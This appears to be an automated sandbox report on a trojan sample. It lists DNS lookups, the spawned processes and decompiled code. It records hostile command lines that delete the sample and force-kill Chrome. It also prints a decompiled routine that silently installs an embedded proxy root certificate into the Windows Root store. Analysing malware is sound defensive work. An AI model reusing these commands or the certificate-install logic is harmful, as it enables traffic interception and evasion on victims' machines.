Apr 12, 2021 13:03:36.427563906 CEST	8.8.8.8	192.168.2.6	0x553d	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.521550894 CEST	8.8.8.8	192.168.2.6	0xd70c	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.803534985 CEST	8.8.8.8	192.168.2.6	0xc38a	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.882491112 CEST	8.8.8.8	192.168.2.6	0x3159	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.944262028 CEST	8.8.8.8	192.168.2.6	0xb123	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.034123898 CEST	8.8.8.8	192.168.2.6	0x5413	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.098603964 CEST	8.8.8.8	192.168.2.6	0xf7d5	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.202089071 CEST	8.8.8.8	192.168.2.6	0xe150	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.268301964 CEST	8.8.8.8	192.168.2.6	0x199f	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.161859989 CEST	8.8.8.8	192.168.2.6	0xa72	Name error (3)	9ED2FEEA30C3CC5D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.319459915 CEST	8.8.8.8	192.168.2.6	0xedf	Name error (3)	55BE681FC6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.461436987 CEST	8.8.8.8	192.168.2.6	0xcefa	Name error (3)	61D53B5A4BC1AB86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.562191010 CEST	8.8.8.8	192.168.2.6	0x6300	Name error (3)	C431A802FF4A46B5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.694890022 CEST	8.8.8.8	192.168.2.6	0x5c15	Name error (3)	84B5A35D6E5335EF.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.774851084 CEST	8.8.8.8	192.168.2.6	0x1725	Name error (3)	BDC347C728B2D94D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.850354910 CEST	8.8.8.8	192.168.2.6	0x446d	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe PID: 6336 Parent PID: 5948

General

Start time:	13:03:06
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 6488 Parent PID: 6336

General

Start time:	13:03:10
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0x100000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6572 Parent PID: 580

General

Start time:	13:03:12
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C
Imagebase:	0x100000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6676 Parent PID: 6336

General

Start time:	13:03:15
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 28%, Metadefender, Browse Detection: 65%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6688 Parent PID: 6336

General

Start time:	13:03:16
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6736 Parent PID: 6336

General

Start time:	13:03:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6744 Parent PID: 6736

General

Start time:	13:03:21
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 6832 Parent PID: 6736

General

Start time:	13:03:24
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 1618257864703.exe PID: 6876 Parent PID: 6676

General

Start time:	13:03:24
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\1618257864703.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6932 Parent PID: 6688

General

Start time:	13:03:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6940 Parent PID: 6932

General

Start time:	13:03:26
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 6984 Parent PID: 6932

General

Start time:	13:03:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0xf20000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7040 Parent PID: 6688

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7052 Parent PID: 7040

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 7084 Parent PID: 7040

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ThunderFW.exe PID: 6188 Parent PID: 6676

General

Start time:	13:03:40
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0x10000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs

Chronological Activities

Analysis Process: cmd.exe PID: 6752 Parent PID: 6676

General

Start time:	13:03:47
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5900 Parent PID: 6752

General

Start time:	13:03:47
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 5880 Parent PID: 6752

General

Start time:	13:03:48
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe PID: 6336 Parent PID: 5948 SecuriteInfo.com.Trojan.Siggen12.33370.30028.exeCOMMON

Executed Functions

Function 10020600, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10020600(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				int _t62;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E100233D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FDA0();
				_v312 = 0;
				E1000CF80(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A150("Global\\exist_sign__install_r3"); // executed
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF80(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0); // executed
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A1D0( &_v312); // executed
							_t102 = _t56;
							_t57 = E1001A1D0( &_v576); // executed
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FE40(); // executed
						E10020020(_t82, _t100, _t102, __eflags, "install", "installp3", "-0.35", "52.0", "exe"); // executed
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E100202C0(_t82, _t100, _t102, __eflags); // executed
						_t115 = _t114 + 0x1c;
						_t62 = PathFileExistsA("C:\\hijack"); // executed
						__eflags = _t62;
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E100202C0(_t82, _t100, _t102, __eflags); // executed
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "installp3");
							E1001FF30(_t82, _t100, _t102, __eflags); // executed
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "installp3");
							E1001FE50(_t82, _t100, _t102, __eflags); // executed
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E100202C0(_t82, _t100, _t102, __eflags); // executed
						} else {
							E1001A100(); // executed
							_t75 = E1001A110(_t89); // executed
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D70();
								if(__eflags == 0) {
									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A2C0(); // executed
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020BC0(__ebx, _t100, _t101, _t126, "52.0");
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}

0x10020600
0x10020600
0x10020600
0x10020603
0x10020605
0x10020610
0x10020611
0x1002061e
0x1002061f
0x10020624
0x10020639
0x1002064f
0x10020659
0x10020661
0x10020678
0x1002067d
0x10020680
0x10020682
0x100206bf
0x100206c4
0x100206c7
0x100206c9
0x100206d0
0x100206e5
0x100206f9
0x10020714
0x10020719
0x1002072c
0x10020738
0x1002073e
0x10020745
0x1002074d
0x10020756
0x1002075b
0x1002075e
0x10020760
0x00000000
0x00000000
0x10020767
0x10020779
0x1002077e
0x00000000
0x00000000
0x10020780
0x00000000
0x1002077e
0x10020784
0x100207a2
0x100207aa
0x100207ad
0x100207af
0x100207bf
0x100207c5
0x100207ca
0x100207d2
0x100207d8
0x100207da
0x10020810
0x10020810
0x10020815
0x10020825
0x1002082b
0x10020833
0x10020838
0x10020848
0x1002084e
0x10020856
0x1002085b
0x1002086b
0x10020871
0x1002087e
0x1002088e
0x10020894
0x100207dc
0x100207dc
0x100207e1
0x100207e6
0x100207e8
0x100207f3
0x100207ea
0x100207ef
0x100207f1
0x100207ff
0x10020804
0x10020807
0x10020809
0x00000000
0x00000000
0x1002080b
0x00000000
0x00000000
0x00000000
0x100207f1
0x100207e8
0x00000000
0x100206cb
0x1002089c
0x100208a1
0x100208ab
0x100208b5
0x100208ba
0x10020684
0x10020689
0x10020691
0x1002069b
0x100206a5
0x100206aa
0x100206aa
0x100208c3
0x100208ce

APIs

_memset.LIBCMT ref: 10020639
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

Strings

52.0, xrefs: 10020684
C:\hijack, xrefs: 100207CD
Global\exist_sign__install_r3, xrefs: 100206BA
52.0, xrefs: 1002078E
installp3, xrefs: 10020798
installp3, xrefs: 10020861
status=main_over, xrefs: 10020884
install, xrefs: 1002079D
-0.35, xrefs: 10020793
status=check_debug, xrefs: 1002081B
installp3, xrefs: 1002083E
exe, xrefs: 10020789
status=main_start, xrefs: 100207B5

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: FileModuleName_memset$_sprintf
String ID: -0.35$52.0$52.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp3$installp3$installp3$status=check_debug$status=main_over$status=main_start
API String ID: 3079340674-1925098667
Opcode ID: 8e84504c8cd3ae04845be091684f389d568562e674228514f4732ea33c4e6c8e
Instruction ID: caf40b379714e25ea3a6c609e0c5d5b05eb5473e79917ee57069ed979baade96
Opcode Fuzzy Hash: 8e84504c8cd3ae04845be091684f389d568562e674228514f4732ea33c4e6c8e
Instruction Fuzzy Hash: 2D5191B5D003189BEB10FBA4DC4ABDD7675EB10384F5401A5FA0966183EF75AB84CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001F780, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E1001F780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CEAF(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA40(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CEAF(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF80(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF80(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF80(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CCA3(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CCA3(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F6E0(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA40(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}

0x1001f780
0x1001f780
0x1001f780
0x1001f789
0x1001f790
0x1001f797
0x1001f79e
0x1001f7a5
0x1001f7c6
0x1001f7da
0x1001f7df
0x1001f7e2
0x1001f7e5
0x1001f7e9
0x1001f803
0x1001f809
0x1001f813
0x1001f819
0x1001f81f
0x1001f820
0x1001f825
0x1001f82c
0x1001f842
0x1001f848
0x1001f84f
0x1001f859
0x1001f861
0x1001f869
0x1001f877
0x1001f87d
0x1001f882
0x1001f888
0x1001f88f
0x1001f8a2
0x1001f8a8
0x1001f8ac
0x1001f8b9
0x1001f8be
0x1001f8c1
0x1001f8c4
0x1001f8c8
0x1001f8db
0x1001f8f1
0x1001f8f7
0x1001f90c
0x1001f914
0x1001f929
0x1001f92e
0x1001f931
0x1001f94c
0x1001f952
0x1001f955
0x00000000
0x00000000
0x1001f97c
0x1001f981
0x1001f943
0x1001f943
0x1001f946
0x1001f946
0x1001f999
0x1001f9bd
0x1001f9c3
0x1001f9c4
0x1001f9c9
0x1001f8c8
0x1001f8ac
0x1001f86b
0x1001f86b
0x1001f86b
0x1001f9d2
0x1001f9d2
0x1001f9dc
0x1001f9dc
0x1001f82c
0x1001f7e9
0x1001f9e8

APIs

CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
